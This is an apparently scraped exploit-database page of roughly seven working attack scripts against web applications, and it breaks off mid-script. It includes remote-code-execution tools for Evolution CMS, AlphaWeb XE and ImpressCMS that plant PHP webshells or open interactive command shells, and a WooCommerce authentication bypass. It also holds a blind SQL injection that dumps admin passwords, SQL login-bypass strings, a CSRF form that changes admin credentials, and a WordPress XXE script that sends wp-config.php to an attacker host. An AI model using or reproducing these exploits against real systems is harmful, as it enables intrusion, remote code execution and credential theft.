    # Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated) # Date: 15-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://evo.im/ # Software Link: https://github.com/evolution-cms/evolution/releases # Version: 3.1.6 # Category: Webapps # Tested on: Linux/Windows # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from bs4 import BeautifulSoup from time import sleep import requests import argparse import sys def main(): parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") sleep(2) exploit(args) def exploit(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) # Login and cookie set session = requests.session() url = args.host + "/manager/?a=0" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "evoq28fzr": "o0hd9im6q76pptjcsjeaa693os" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Content-Type": "application/x-www-form-urlencoded;", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/manager/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "ajax": "1", "username": args.login, "password": args.password, "rememberme": "1" } response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5) new_cookie = response.cookies.get("evoq28fzr") user_role = response.cookies.get("modx_remember_manager") if user_role is None: print("[-] Login Failed!\n") print("[*]",response.text) sleep(2) exit(1) else: print("[+] Login Success!\n") sleep(2) print("[!] Login User", user_role,"\n") sleep(2) # User authorization check url = args.host + "/manager/index.php" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "a": "109", "id": "1", "mode": "108", "stay": "2", "name": "rce", "description": "<strong>0.1.3</strong> first repository for Evolution CMS ", "categoryid": "1", "newcategory": '', "icon": '', "resourcefile": '', "post": "system('whoami');", "guid": "8d4669cac3afd1f59d416f11eadf3355", "properties": "{}", "chkallgroups": "on", "save": "Submit" } response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5) soup = BeautifulSoup(response.text, 'html.parser') if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)": print("[!] Unauthorized user\n\n") print("User with module creation permissions is required.") exit(1) elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!": print("[!] Unauthorized user\n\n") print("User with module creation permissions is required.") exit(1) else: print ("[+] Exploit Done!\n") sleep(2) pass while True: cmd = input("$ ") # Update Modules url = args.host + "/manager/index.php" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "a": "109", "id": "1", "mode": "108", "stay": "2", "name": "rce", "description": "<strong>0.1.3</strong> first repository for Evolution CMS ", "categoryid": "1", "newcategory": '', "icon": '', "resourcefile": '', "post": "system('"+cmd+"');", "guid": "8d4669cac3afd1f59d416f11eadf3355", "properties": "{}", "chkallgroups": "on", "save": "Submit" } response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5) # Run Modules url = args.host + "/manager/index.php?id=1&a=112" cookies = { "mybb[lastvisit]": "1631537273", "loginattempts": "1", "mybb[lastactive]": "1631537588", "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn", "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq", "KCFINDER_showname": "on", "KCFINDER_showsize": "off", "KCFINDER_showtime": "off", "KCFINDER_order": "name", "KCFINDER_orderDesc": "off", "KCFINDER_view": "thumbs", "KCFINDER_displaySettings": "off", "webfxtab_modulePane": "0", "evoq28fzr": new_cookie, } headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/manager/index.php?a=108&id=1", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  16. ISHACK AI BOT

    AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated) # Date: 09/09/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor website: https://www.zenitel.com/ # Product website: https://wiki.zenitel.com/wiki/AlphaWeb # Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami" # Reference: https://github.com/ricardojoserf/CVE-2021-40845 import requests import base64 import argparse # Default credentials, change them if it is necessary admin_user = "admin" admin_pass = "alphaadmin" scripter_user = "scripter" scripter_pass = "alphascript" def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Target url') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') my_args = parser.parse_args() return my_args def main(): args = get_args() base_url = args.url url_main = base_url + "/php/index.php" url_upload = base_url + "/php/script_uploads.php" command = args.command uploaded_file = "poc.php" url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command login_authorization = "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii')) upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii')) headers_login = { "Authorization": login_authorization, "Cache-Control": "max-age=0" } headers_upload = { 'Authorization': upload_authorization, 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"', 'sec-ch-ua-mobile': '?0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', } files = { "userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"), } s = requests.session() # Login as admin s.get(url_main, headers = headers_login) # Upload file upload = s.post(url_upload, files=files, headers = headers_upload) # Execute command cmd = s.post(url_cmd) print(cmd.text.replace("<pre>","").replace("</pre>","")) if __name__ == "__main__": main()
  17. ISHACK AI BOT

    ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated) # Date: 15-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.impresscms.org/ # Software Link: https://www.impresscms.org/modules/downloads/ # Version: 1.4.2 # Category: Webapps # Tested on: Linux/Windows # ImpressCMS is a multilingual content management system for the web # Contains an endpoint that allows remote access # Autotask page misconfigured, causing security vulnerability # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 import requests import argparse import sys from time import sleep session = requests.session() def main(): parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") exploit(args) def countdown(time_sec): while time_sec: mins, secs = divmod(time_sec, 60) timeformat = '{:02d}'.format(secs) print("["+timeformat+"] The task is expected to run!", end='\r') sleep(1) time_sec -= 1 def exploit(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable") exit(1) response = requests.get(args.host + "/evil.php") if response.status_code == 200: print("[*] Exploit file exists!\n") sleep(2) print("[+] Exploit Done!\n") while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) else: #Login and set cookie url = args.host + "/user.php" cookies = { "ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "uname": args.login, "pass": args.password, "xoops_redirect": "/", "op": "login" } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookies = session.cookies.get("ICMSSESSION") if (new_cookies is None): print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) exit(1) else: print("[+] Success Login...\n") sleep(2) # Create Tasks url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod" cookies = { "ICMSSESSION": new_cookies } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks": print("[*] Task Create.\n") sleep(2) countdown(60) print("\n\n[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) elif response.headers.get("location") == args.host + "/user.php": print("[!] Unauthorized user!\n\n") print("Requires user with create task permissions.") sleep(2) else: pass if __name__ == '__main__': main()
  18. ISHACK AI BOT

    WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass # Date: 2021-09-16 # Exploit Author: Sebastian Kriesten (0xB455) # Contact: https://twitter.com/0xB455 # # Affected Plugin: Booster for WooCommerce # Plugin Slug: woocommerce-jetpack # Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ # Affected Versions: <= 5.4.3 # Fully Patched Version: >= 5.4.4 # CVE: CVE-2021-34646 # CVSS Score: 9.8 (Critical) # Category: webapps # # 1: # Goto: https://target.com/wp-json/wp/v2/users/ # Pick a user-ID (e.g. 1 - usualy is the admin) # # 2: # Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1 # # 3: # Check-Out out which of the generated links allows you to access the system # import requests,sys,hashlib import argparse import datetime import email.utils import calendar import base64 B = "\033[94m" W = "\033[97m" R = "\033[91m" RST = "\033[0;0m" parser = argparse.ArgumentParser() parser.add_argument("url", help="the base url") parser.add_argument('id', type=int, help='the user id', default=1) args = parser.parse_args() id = str(args.id) url = args.url if args.url[-1] != "/": # URL needs trailing / url = url + "/" verify_url= url + "?wcj_user_id=" + id r = requests.get(verify_url) if r.status_code != 200: print("status code != 200") print(r.headers) sys.exit(-1) def email_time_to_timestamp(s): tt = email.utils.parsedate_tz(s) if tt is None: return None return calendar.timegm(tt) - tt[9] date = r.headers["Date"] unix = email_time_to_timestamp(date) def printBanner(): print(f"{W}Timestamp: {B}" + date) print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n") print("We need to generate multiple timestamps in order to avoid delay related timing errors") print("One of the following links will log you in...\n") printBanner() for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors hash = hashlib.md5(str(unix-i).encode()).hexdigest() print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:") token='{"id":"'+ id +'","code":"'+hash+'"}' token = base64.b64encode(token.encode()).decode() token = token.rstrip("=") # remove trailing = link = url+"my-account/?wcj_verify_email="+token print(link + f"\n{RST}")
  19. ISHACK AI BOT

    Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) # Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec) # Date: 16/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip # Vendor: breakthrough2 # Tested on: Kali Linux, Apache, Mysql # Version: v1.0 # Exploit Description: # Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack. # Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html import requests,argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G') requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} # POST /LibraryManagement/fine-student.php # inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha def sqliPayload(char,position,userid,column,table): sqli = 'inject\' UNION SELECT IF(SUBSTRING(' sqli += str(column)+',' sqli += str(position)+',1) = \'' sqli += str(char)+'\',sleep(1),null) FROM ' sqli += str(table)+' WHERE adminId=' sqli += str(userid)+'; -- kamahamaha' return sqli chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', '8','9','@','#'] def postRequest(URL,sqliReq,char,position,pxy): sqliURL = URL params = {"check":1,"id":sqliReq} if pxy: req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10) else: req = requests.post(url=sqliURL, data=params, verify=False, timeout=10) #print("{} : {}".format(char,req.elapsed.total_seconds())) return req.elapsed.total_seconds() def theHarvester(target,CHARS,url,pxy): #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id'])) position = 1 theHarvest = "" while position < 8: for char in CHARS: sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table']) if postRequest(url,sqliReq,char,position,pxy) > 1: theHarvest += char break; position += 1 return theHarvest class userObj: def __init__(self,username,password): self.username = username self.password = password class tableSize: def __init__(self,sizeU,sizeP): self.sizeU = sizeU self.sizeP = sizeP self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST def printHeader(self): width = self.sizeU+self.sizeP+3 print(BR+" "*width+ST) print(self.uTitle,self.pTitle) print(BR+" "*width+ST) def printTableRow(user,size): username = user.username unLen = len(username) if unLen < size.sizeU: username = username+(" "*(size.sizeU - unLen)) else: name = name[:size.sizeU] username += BR+" "+ST password = user.password pLen = len(password) if pLen < size.sizeP: password = password+(" "*(size.sizeP - pLen)) else: password = password[:size.sizeP] password += BR+" "+ST print(username,password) def sig(): SIG = SB+FY+" .-----.._ ,--.\n" SIG += FY+" | .. > ___ | | .--.\n" SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n" SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n" SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n" SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST return SIG def argsetup(): about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"') parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5') parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent') args = parser.parse_args() if args.proxy: regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$' if re.match(regex,args.proxy,re.IGNORECASE): args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)} else: print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex)) print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0])) sys.exit(-1) else: proxy = False return args if __name__ == "__main__": header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST print(header) print(sig()) args = argsetup() host = args.targetHost pxy = args.proxy admins = args.DumpXAdmins PATH = host+"/LibraryManagement/fine-student.php" size = tableSize(20,20) size.printHeader() dumpnumber = 1 while dumpnumber <= admins: adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"} adminUsername = theHarvester(adminUsername,chars,PATH,pxy) adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"} adminPass = theHarvester(adminPassword,chars,PATH,pxy) adminUser = userObj(adminUsername,adminPass) printTableRow(adminUser,size) # print("Admin's Username is: {}".format(adminUsername)) # print("Admin's Password is: {}".format(adminPass)) dumpnumber += 1
  20. ISHACK AI BOT

    Simple Attendance System 1.0 - Authenticated bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Simple Attendance System 1.0 - Authenticated bypass # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: September 17, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Simple Attendance System, is prone to multiple vulnerabilities. Easy authentication bypass vulnerability on the application allowing the attacker to login ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/attendance/login.php Username: admin' or ''=' -- -+ Password: admin' or ''=' -- -+ ----- PoC-2: Authentication Bypass ----- Steps: 1. Enter wrong crendentials http://localhost/attendance/login.php 2. Capture the request in burp and send it to repeater. 3. Forward the request. 4. In response tab, replace : {"status":"failed","msg":"Invalid username or password."} with {"status":"success","msg":"Login successfully."}
  21. ISHACK AI BOT

    T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux (2021.4) / xammp # Category: WebApp # Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'" # Date: 2021-08-15 ######## Description ######## # # Attacker can change admin informaiton # # ######## Proof of Concept ######## POST /srv/service/admin/updateuserinfo HTTP/1.1 Host: localhost Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: http://localhost Referer: http://localhost/Y/ Te: trailers Connection: close firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595 ####### EXPLOIT ################## <html> <body> <script>history.pushState('', '', '/')</script> <form action="victimsite.com/srv/service/admin/updateuserinfo" method="POST"> <input type="hidden" name="firstName" value="[CHANGEHERE]" /> <input type="hidden" name="lastName" value="[CHANGEHERE]" /> <input type="hidden" name="email" value="[CHANGEHERE]" /> <input type="hidden" name="phone" value="[CHANGEHERE]" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  22. ISHACK AI BOT

    WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) # Date: 16/09/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://wordpress.com # Affected Version: WordPress 5.6-5.7 & PHP8 # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2021-29447 #!/bin/bash # Author: @David_Uton (m3n0sd0n4ld) # Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST # Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX # Variables rHost=$1 username=$2 password=$3 readFile=$4 lHost=$5 # Functions # Logotype logoType(){ echo " ===================================== CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated) ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ =====================================" } # Create wav malicious wavCreate(){ echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav" } # Create xx3.dtd dtdCreate(){ cat <<EOT > xx3.dtd <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile"> <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://$lHost:8000/?p=%file;'>" > EOT } # wav upload wavUpload(){ cat <<EOT > .upload.py #/usr/bin/env python3 import requests, re, sys postData = { 'log':"$username", 'pwd':"$password", 'wp-submit':'Log In', 'redirect_to':'http://$rHost/wp-admin/', 'testcookie':1 } r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True cookies = 